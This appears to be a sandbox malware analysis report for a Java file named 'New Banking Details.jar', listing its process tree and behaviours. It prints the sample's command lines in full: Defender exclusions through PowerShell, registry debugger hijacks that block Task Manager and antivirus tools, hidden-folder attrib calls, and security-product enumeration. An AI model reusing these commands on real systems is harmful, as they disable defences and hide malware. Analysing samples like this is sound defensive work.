PID 1204 wrote to memory of 1944 1204 java.exe 205 PID 1204 wrote to memory of 1944 1204 java.exe 205 PID 1204 wrote to memory of 1944 1204 java.exe 205 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 844 wrote to memory of 1060 844 cmd.exe 220 PID 844 wrote to memory of 1060 844 cmd.exe 220 PID 844 wrote to memory of 1060 844 cmd.exe 220 PID 844 wrote to memory of 1664 844 cmd.exe 221 PID 844 wrote to memory of 1664 844 cmd.exe 221 PID 844 wrote to memory of 1664 844 cmd.exe 221 PID 1204 wrote to memory of 1516 1204 java.exe 222 PID 1204 wrote to memory of 1516 1204 java.exe 222 PID 1204 wrote to memory of 1516 1204 java.exe 222 PID 1516 wrote to memory of 1604 1516 cmd.exe 223 PID 1516 wrote to memory of 1604 1516 cmd.exe 223 PID 1516 wrote to memory of 1604 1516 cmd.exe 223 PID 1516 wrote to memory of 1768 1516 cmd.exe 224 PID 1516 wrote to memory of 1768 1516 cmd.exe 224 PID 1516 wrote to memory of 1768 1516 cmd.exe 224 PID 1204 wrote to memory of 1564 1204 java.exe 225 PID 1204 wrote to memory of 1564 1204 java.exe 225 PID 1204 wrote to memory of 1564 1204 java.exe 225 PID 1564 wrote to memory of 1520 1564 cmd.exe 226 PID 1564 wrote to memory of 1520 1564 cmd.exe 226 PID 1564 wrote to memory of 1520 1564 cmd.exe 226 PID 1564 wrote to memory of 1584 1564 cmd.exe 227 PID 1564 wrote to memory of 1584 1564 cmd.exe 227 PID 1564 wrote to memory of 1584 1564 cmd.exe 227 PID 1204 wrote to memory of 528 1204 java.exe 228 PID 1204 wrote to memory of 528 1204 java.exe 228 PID 1204 wrote to memory of 528 1204 java.exe 228 PID 528 wrote to memory of 760 528 cmd.exe 229 PID 528 wrote to memory of 760 528 cmd.exe 229 PID 528 wrote to memory of 760 528 cmd.exe 229 PID 528 wrote to memory of 1904 528 cmd.exe 230 PID 528 wrote to memory of 1904 528 cmd.exe 230 PID 528 wrote to memory of 1904 528 cmd.exe 230 PID 1204 wrote to memory of 456 1204 java.exe 231 PID 1204 wrote to memory of 456 1204 java.exe 231 PID 1204 wrote to memory of 456 1204 java.exe 231 PID 1204 wrote to memory of 1036 1204 java.exe 232 PID 1204 wrote to memory of 1036 1204 java.exe 232 PID 1204 wrote to memory of 1036 1204 java.exe 232 PID 456 wrote to memory of 464 456 cmd.exe 233 PID 456 wrote to memory of 464 456 cmd.exe 233 PID 456 wrote to memory of 464 456 cmd.exe 233 PID 456 wrote to memory of 1180 456 cmd.exe 235 PID 456 wrote to memory of 1180 456 cmd.exe 235 PID 456 wrote to memory of 1180 456 cmd.exe 235 PID 1204 wrote to memory of 2000 1204 java.exe 236 PID 1204 wrote to memory of 2000 1204 java.exe 236 PID 1204 wrote to memory of 2000 1204 java.exe 236 PID 2000 wrote to memory of 2040 2000 cmd.exe 237 PID 2000 wrote to memory of 2040 2000 cmd.exe 237 PID 2000 wrote to memory of 2040 2000 cmd.exe 237 PID 2000 wrote to memory of 1920 2000 cmd.exe 238 PID 2000 wrote to memory of 1920 2000 cmd.exe 238 PID 2000 wrote to memory of 1920 2000 cmd.exe 238 PID 1204 wrote to memory of 1164 1204 java.exe 239 PID 1204 wrote to memory of 1164 1204 java.exe 239 PID 1204 wrote to memory of 1164 1204 java.exe 239 PID 1164 wrote to memory of 1500 1164 cmd.exe 240 PID 1164 wrote to memory of 1500 1164 cmd.exe 240 PID 1164 wrote to memory of 1500 1164 cmd.exe 240 PID 1164 wrote to memory of 1072 1164 cmd.exe 241 PID 1164 wrote to memory of 1072 1164 cmd.exe 241 PID 1164 wrote to memory of 1072 1164 cmd.exe 241 PID 1204 wrote to memory of 1976 1204 java.exe 242 PID 1204 wrote to memory of 1976 1204 java.exe 242 PID 1204 wrote to memory of 1976 1204 java.exe 242 PID 1976 wrote to memory of 1388 1976 cmd.exe 243 PID 1976 wrote to memory of 1388 1976 cmd.exe 243 PID 1976 wrote to memory of 1388 1976 cmd.exe 243 PID 1976 wrote to memory of 1792 1976 cmd.exe 244 PID 1976 wrote to memory of 1792 1976 cmd.exe 244 PID 1976 wrote to memory of 1792 1976 cmd.exe 244 PID 1204 wrote to memory of 1012 1204 java.exe 245 PID 1204 wrote to memory of 1012 1204 java.exe 245 PID 1204 wrote to memory of 1012 1204 java.exe 245 PID 1012 wrote to memory of 2032 1012 cmd.exe 246 PID 1012 wrote to memory of 2032 1012 cmd.exe 246 PID 1012 wrote to memory of 2032 1012 cmd.exe 246 PID 1012 wrote to memory of 1804 1012 cmd.exe 247 PID 1012 wrote to memory of 1804 1012 cmd.exe 247 PID 1012 wrote to memory of 1804 1012 cmd.exe 247 PID 1204 wrote to memory of 1344 1204 java.exe 248 PID 1204 wrote to memory of 1344 1204 java.exe 248 PID 1204 wrote to memory of 1344 1204 java.exe 248 PID 1344 wrote to memory of 1968 1344 cmd.exe 249 PID 1344 wrote to memory of 1968 1344 cmd.exe 249 PID 1344 wrote to memory of 1968 1344 cmd.exe 249 PID 1344 wrote to memory of 2028 1344 cmd.exe 250 PID 1344 wrote to memory of 2028 1344 cmd.exe 250 PID 1344 wrote to memory of 2028 1344 cmd.exe 250 PID 1204 wrote to memory of 1664 1204 java.exe 251 PID 1204 wrote to memory of 1664 1204 java.exe 251 PID 1204 wrote to memory of 1664 1204 java.exe 251 PID 1664 wrote to memory of 1924 1664 cmd.exe 252 PID 1664 wrote to memory of 1924 1664 cmd.exe 252 PID 1664 wrote to memory of 1924 1664 cmd.exe 252 PID 1664 wrote to memory of 1900 1664 cmd.exe 253 PID 1664 wrote to memory of 1900 1664 cmd.exe 253 PID 1664 wrote to memory of 1900 1664 cmd.exe 253 PID 1204 wrote to memory of 1840 1204 java.exe 254 PID 1204 wrote to memory of 1840 1204 java.exe 254 PID 1204 wrote to memory of 1840 1204 java.exe 254 PID 1840 wrote to memory of 1520 1840 cmd.exe 255 PID 1840 wrote to memory of 1520 1840 cmd.exe 255 PID 1840 wrote to memory of 1520 1840 cmd.exe 255 PID 1840 wrote to memory of 1856 1840 cmd.exe 256 PID 1840 wrote to memory of 1856 1840 cmd.exe 256 PID 1840 wrote to memory of 1856 1840 cmd.exe 256 PID 1204 wrote to memory of 1880 1204 java.exe 257 PID 1204 wrote to memory of 1880 1204 java.exe 257 PID 1204 wrote to memory of 1880 1204 java.exe 257 PID 1880 wrote to memory of 1904 1880 cmd.exe 258 PID 1880 wrote to memory of 1904 1880 cmd.exe 258 PID 1880 wrote to memory of 1904 1880 cmd.exe 258 PID 1880 wrote to memory of 1620 1880 cmd.exe 259 PID 1880 wrote to memory of 1620 1880 cmd.exe 259 PID 1880 wrote to memory of 1620 1880 cmd.exe 259 PID 1204 wrote to memory of 1812 1204 java.exe 260 PID 1204 wrote to memory of 1812 1204 java.exe 260 PID 1204 wrote to memory of 1812 1204 java.exe 260 PID 1812 wrote to memory of 1180 1812 cmd.exe 261 PID 1812 wrote to memory of 1180 1812 cmd.exe 261 PID 1812 wrote to memory of 1180 1812 cmd.exe 261 PID 1812 wrote to memory of 740 1812 cmd.exe 262 PID 1812 wrote to memory of 740 1812 cmd.exe 262 PID 1812 wrote to memory of 740 1812 cmd.exe 262 PID 1204 wrote to memory of 1396 1204 java.exe 263 PID 1204 wrote to memory of 1396 1204 java.exe 263 PID 1204 wrote to memory of 1396 1204 java.exe 263 PID 1396 wrote to memory of 1864 1396 cmd.exe 264 PID 1396 wrote to memory of 1864 1396 cmd.exe 264 PID 1396 wrote to memory of 1864 1396 cmd.exe 264 PID 1396 wrote to memory of 1548 1396 cmd.exe 265 PID 1396 wrote to memory of 1548 1396 cmd.exe 265 PID 1396 wrote to memory of 1548 1396 cmd.exe 265 PID 1204 wrote to memory of 2040 1204 java.exe 266 PID 1204 wrote to memory of 2040 1204 java.exe 266 PID 1204 wrote to memory of 2040 1204 java.exe 266 PID 2040 wrote to memory of 1560 2040 cmd.exe 267 PID 2040 wrote to memory of 1560 2040 cmd.exe 267 PID 2040 wrote to memory of 1560 2040 cmd.exe 267 PID 2040 wrote to memory of 1592 2040 cmd.exe 268 PID 2040 wrote to memory of 1592 2040 cmd.exe 268 PID 2040 wrote to memory of 1592 2040 cmd.exe 268 PID 1204 wrote to memory of 1072 1204 java.exe 269 PID 1204 wrote to memory of 1072 1204 java.exe 269 PID 1204 wrote to memory of 1072 1204 java.exe 269 PID 1072 wrote to memory of 1484 1072 cmd.exe 270 PID 1072 wrote to memory of 1484 1072 cmd.exe 270 PID 1072 wrote to memory of 1484 1072 cmd.exe 270 PID 1072 wrote to memory of 1948 1072 cmd.exe 271 PID 1072 wrote to memory of 1948 1072 cmd.exe 271 PID 1072 wrote to memory of 1948 1072 cmd.exe 271 PID 1204 wrote to memory of 1340 1204 java.exe 272 PID 1204 wrote to memory of 1340 1204 java.exe 272 PID 1204 wrote to memory of 1340 1204 java.exe 272 PID 1340 wrote to memory of 2032 1340 cmd.exe 273 PID 1340 wrote to memory of 2032 1340 cmd.exe 273 PID 1340 wrote to memory of 2032 1340 cmd.exe 273 PID 1340 wrote to memory of 1956 1340 cmd.exe 274 PID 1340 wrote to memory of 1956 1340 cmd.exe 274 PID 1340 wrote to memory of 1956 1340 cmd.exe 274 PID 1204 wrote to memory of 368 1204 java.exe 275 PID 1204 wrote to memory of 368 1204 java.exe 275 PID 1204 wrote to memory of 368 1204 java.exe 275 PID 368 wrote to memory of 304 368 cmd.exe 276 PID 368 wrote to memory of 304 368 cmd.exe 276 PID 368 wrote to memory of 304 368 cmd.exe 276 PID 368 wrote to memory of 1164 368 cmd.exe 277 PID 368 wrote to memory of 1164 368 cmd.exe 277 PID 368 wrote to memory of 1164 368 cmd.exe 277 PID 1204 wrote to memory of 1784 1204 java.exe 278 PID 1204 wrote to memory of 1784 1204 java.exe 278 PID 1204 wrote to memory of 1784 1204 java.exe 278 PID 1784 wrote to memory of 1816 1784 cmd.exe 279 PID 1784 wrote to memory of 1816 1784 cmd.exe 279 PID 1784 wrote to memory of 1816 1784 cmd.exe 279 PID 1784 wrote to memory of 1564 1784 cmd.exe 280 PID 1784 wrote to memory of 1564 1784 cmd.exe 280 PID 1784 wrote to memory of 1564 1784 cmd.exe 280 PID 1204 wrote to memory of 1612 1204 java.exe 281 PID 1204 wrote to memory of 1612 1204 java.exe 281 PID 1204 wrote to memory of 1612 1204 java.exe 281 PID 1204 wrote to memory of 1572 1204 java.exe 282 PID 1204 wrote to memory of 1572 1204 java.exe 282 PID 1204 wrote to memory of 1572 1204 java.exe 282 PID 1572 wrote to memory of 1544 1572 cmd.exe 284 PID 1572 wrote to memory of 1544 1572 cmd.exe 284 PID 1572 wrote to memory of 1544 1572 cmd.exe 284 PID 1572 wrote to memory of 1472 1572 cmd.exe 285 PID 1572 wrote to memory of 1472 1572 cmd.exe 285 PID 1572 wrote to memory of 1472 1572 cmd.exe 285 PID 1204 wrote to memory of 1012 1204 java.exe 286 PID 1204 wrote to memory of 1012 1204 java.exe 286 PID 1204 wrote to memory of 1012 1204 java.exe 286 PID 1012 wrote to memory of 1968 1012 cmd.exe 287 PID 1012 wrote to memory of 1968 1012 cmd.exe 287 PID 1012 wrote to memory of 1968 1012 cmd.exe 287 PID 1012 wrote to memory of 1480 1012 cmd.exe 288 PID 1012 wrote to memory of 1480 1012 cmd.exe 288 PID 1012 wrote to memory of 1480 1012 cmd.exe 288 PID 1204 wrote to memory of 1780 1204 java.exe 289 PID 1204 wrote to memory of 1780 1204 java.exe 289 PID 1204 wrote to memory of 1780 1204 java.exe 289 PID 1780 wrote to memory of 1900 1780 cmd.exe 290 PID 1780 wrote to memory of 1900 1780 cmd.exe 290 PID 1780 wrote to memory of 1900 1780 cmd.exe 290 PID 1780 wrote to memory of 1932 1780 cmd.exe 291 PID 1780 wrote to memory of 1932 1780 cmd.exe 291 PID 1780 wrote to memory of 1932 1780 cmd.exe 291 PID 1204 wrote to memory of 1228 1204 java.exe 292 PID 1204 wrote to memory of 1228 1204 java.exe 292 PID 1204 wrote to memory of 1228 1204 java.exe 292 PID 1228 wrote to memory of 1732 1228 cmd.exe 293 PID 1228 wrote to memory of 1732 1228 cmd.exe 293 PID 1228 wrote to memory of 1732 1228 cmd.exe 293 PID 1228 wrote to memory of 1904 1228 cmd.exe 294 PID 1228 wrote to memory of 1904 1228 cmd.exe 294 PID 1228 wrote to memory of 1904 1228 cmd.exe 294 PID 1204 wrote to memory of 1556 1204 java.exe 295 PID 1204 wrote to memory of 1556 1204 java.exe 295 PID 1204 wrote to memory of 1556 1204 java.exe 295 PID 1556 wrote to memory of 1052 1556 cmd.exe 296 PID 1556 wrote to memory of 1052 1556 cmd.exe 296 PID 1556 wrote to memory of 1052 1556 cmd.exe 296 PID 1556 wrote to memory of 740 1556 cmd.exe 297 PID 1556 wrote to memory of 740 1556 cmd.exe 297 PID 1556 wrote to memory of 740 1556 cmd.exe 297 PID 1204 wrote to memory of 1456 1204 java.exe 298 PID 1204 wrote to memory of 1456 1204 java.exe 298 PID 1204 wrote to memory of 1456 1204 java.exe 298 PID 1456 wrote to memory of 1860 1456 cmd.exe 299 PID 1456 wrote to memory of 1860 1456 cmd.exe 299 PID 1456 wrote to memory of 1860 1456 cmd.exe 299 PID 1456 wrote to memory of 1628 1456 cmd.exe 300 PID 1456 wrote to memory of 1628 1456 cmd.exe 300 PID 1456 wrote to memory of 1628 1456 cmd.exe 300 PID 1204 wrote to memory of 1560 1204 java.exe 301 PID 1204 wrote to memory of 1560 1204 java.exe 301 PID 1204 wrote to memory of 1560 1204 java.exe 301 PID 1560 wrote to memory of 1076 1560 cmd.exe 302 PID 1560 wrote to memory of 1076 1560 cmd.exe 302 PID 1560 wrote to memory of 1076 1560 cmd.exe 302 PID 1560 wrote to memory of 1460 1560 cmd.exe 303 PID 1560 wrote to memory of 1460 1560 cmd.exe 303 PID 1560 wrote to memory of 1460 1560 cmd.exe 303 PID 1204 wrote to memory of 1948 1204 java.exe 304 PID 1204 wrote to memory of 1948 1204 java.exe 304 PID 1204 wrote to memory of 1948 1204 java.exe 304 PID 1948 wrote to memory of 1476 1948 cmd.exe 305 PID 1948 wrote to memory of 1476 1948 cmd.exe 305 PID 1948 wrote to memory of 1476 1948 cmd.exe 305 PID 1948 wrote to memory of 2020 1948 cmd.exe 306 PID 1948 wrote to memory of 2020 1948 cmd.exe 306 PID 1948 wrote to memory of 2020 1948 cmd.exe 306 PID 1204 wrote to memory of 1504 1204 java.exe 307 PID 1204 wrote to memory of 1504 1204 java.exe 307 PID 1204 wrote to memory of 1504 1204 java.exe 307 PID 1504 wrote to memory of 304 1504 cmd.exe 308 PID 1504 wrote to memory of 304 1504 cmd.exe 308 PID 1504 wrote to memory of 304 1504 cmd.exe 308 PID 1504 wrote to memory of 456 1504 cmd.exe 309 PID 1504 wrote to memory of 456 1504 cmd.exe 309 PID 1504 wrote to memory of 456 1504 cmd.exe 309 PID 1204 wrote to memory of 1952 1204 java.exe 310 PID 1204 wrote to memory of 1952 1204 java.exe 310 PID 1204 wrote to memory of 1952 1204 java.exe 310 PID 1952 wrote to memory of 1564 1952 cmd.exe 311 PID 1952 wrote to memory of 1564 1952 cmd.exe 311 PID 1952 wrote to memory of 1564 1952 cmd.exe 311 PID 1952 wrote to memory of 1056 1952 cmd.exe 312 PID 1952 wrote to memory of 1056 1952 cmd.exe 312 PID 1952 wrote to memory of 1056 1952 cmd.exe 312 PID 1204 wrote to memory of 672 1204 java.exe 313 PID 1204 wrote to memory of 672 1204 java.exe 313 PID 1204 wrote to memory of 672 1204 java.exe 313 PID 672 wrote to memory of 1472 672 cmd.exe 314 PID 672 wrote to memory of 1472 672 cmd.exe 314 PID 672 wrote to memory of 1472 672 cmd.exe 314 PID 672 wrote to memory of 1912 672 cmd.exe 315 PID 672 wrote to memory of 1912 672 cmd.exe 315 PID 672 wrote to memory of 1912 672 cmd.exe 315 PID 1204 wrote to memory of 2012 1204 java.exe 316 PID 1204 wrote to memory of 2012 1204 java.exe 316 PID 1204 wrote to memory of 2012 1204 java.exe 316 PID 2012 wrote to memory of 1612 2012 cmd.exe 317 PID 2012 wrote to memory of 1612 2012 cmd.exe 317 PID 2012 wrote to memory of 1612 2012 cmd.exe 317 PID 2012 wrote to memory of 1060 2012 cmd.exe 318 PID 2012 wrote to memory of 1060 2012 cmd.exe 318 PID 2012 wrote to memory of 1060 2012 cmd.exe 318 PID 1204 wrote to memory of 1968 1204 java.exe 319 PID 1204 wrote to memory of 1968 1204 java.exe 319 PID 1204 wrote to memory of 1968 1204 java.exe 319 PID 1968 wrote to memory of 1768 1968 cmd.exe 320 PID 1968 wrote to memory of 1768 1968 cmd.exe 320 PID 1968 wrote to memory of 1768 1968 cmd.exe 320 PID 1968 wrote to memory of 1520 1968 cmd.exe 321 PID 1968 wrote to memory of 1520 1968 cmd.exe 321 PID 1968 wrote to memory of 1520 1968 cmd.exe 321 PID 1204 wrote to memory of 1932 1204 java.exe 322 PID 1204 wrote to memory of 1932 1204 java.exe 322 PID 1204 wrote to memory of 1932 1204 java.exe 322 PID 1932 wrote to memory of 1828 1932 cmd.exe 323 PID 1932 wrote to memory of 1828 1932 cmd.exe 323 PID 1932 wrote to memory of 1828 1932 cmd.exe 323 PID 1932 wrote to memory of 1616 1932 cmd.exe 324 PID 1932 wrote to memory of 1616 1932 cmd.exe 324 PID 1932 wrote to memory of 1616 1932 cmd.exe 324 PID 1204 wrote to memory of 1512 1204 java.exe 325 PID 1204 wrote to memory of 1512 1204 java.exe 325 PID 1204 wrote to memory of 1512 1204 java.exe 325 PID 1512 wrote to memory of 1052 1512 cmd.exe 326 PID 1512 wrote to memory of 1052 1512 cmd.exe 326 PID 1512 wrote to memory of 1052 1512 cmd.exe 326 PID 1512 wrote to memory of 1864 1512 cmd.exe 327 PID 1512 wrote to memory of 1864 1512 cmd.exe 327 PID 1512 wrote to memory of 1864 1512 cmd.exe 327 PID 1204 wrote to memory of 824 1204 java.exe 328 PID 1204 wrote to memory of 824 1204 java.exe 328 PID 1204 wrote to memory of 824 1204 java.exe 328 PID 824 wrote to memory of 1628 824 cmd.exe 329 PID 824 wrote to memory of 1628 824 cmd.exe 329 PID 824 wrote to memory of 1628 824 cmd.exe 329 PID 824 wrote to memory of 1388 824 cmd.exe 330 PID 824 wrote to memory of 1388 824 cmd.exe 330 PID 824 wrote to memory of 1388 824 cmd.exe 330 PID 1204 wrote to memory of 1484 1204 java.exe 331 PID 1204 wrote to memory of 1484 1204 java.exe 331 PID 1204 wrote to memory of 1484 1204 java.exe 331 PID 1484 wrote to memory of 2032 1484 cmd.exe 332 PID 1484 wrote to memory of 2032 1484 cmd.exe 332 PID 1484 wrote to memory of 2032 1484 cmd.exe 332 PID 1484 wrote to memory of 1476 1484 cmd.exe 333 PID 1484 wrote to memory of 1476 1484 cmd.exe 333 PID 1484 wrote to memory of 1476 1484 cmd.exe 333 PID 1204 wrote to memory of 528 1204 java.exe 334 PID 1204 wrote to memory of 528 1204 java.exe 334 PID 1204 wrote to memory of 528 1204 java.exe 334 PID 528 wrote to memory of 1672 528 cmd.exe 335 PID 528 wrote to memory of 1672 528 cmd.exe 335 PID 528 wrote to memory of 1672 528 cmd.exe 335 PID 528 wrote to memory of 456 528 cmd.exe 336 PID 528 wrote to memory of 456 528 cmd.exe 336 PID 528 wrote to memory of 456 528 cmd.exe 336 PID 1204 wrote to memory of 844 1204 java.exe 337 PID 1204 wrote to memory of 844 1204 java.exe 337 PID 1204 wrote to memory of 844 1204 java.exe 337 PID 844 wrote to memory of 1516 844 cmd.exe 338 PID 844 wrote to memory of 1516 844 cmd.exe 338 PID 844 wrote to memory of 1516 844 cmd.exe 338 PID 844 wrote to memory of 2028 844 cmd.exe 339 PID 844 wrote to memory of 2028 844 cmd.exe 339 PID 844 wrote to memory of 2028 844 cmd.exe 339 PID 1204 wrote to memory of 1472 1204 java.exe 340 PID 1204 wrote to memory of 1472 1204 java.exe 340 PID 1204 wrote to memory of 1472 1204 java.exe 340 PID 1204 wrote to memory of 1552 1204 java.exe 342 PID 1204 wrote to memory of 1552 1204 java.exe 342 PID 1204 wrote to memory of 1552 1204 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1828 attrib.exe 1180 attrib.exe 1820 attrib.exe 1764 attrib.exe 1752 attrib.exe 1732 attrib.exe 1792 attrib.exe 1380 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\New Banking Details.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1792
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1380
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1180
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1764
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1752
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class2⤵
- Views/modifies file attributes
PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:672
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1968
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1948
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1552
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1504
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1632
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1508
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:620
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1340
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1636
-
-
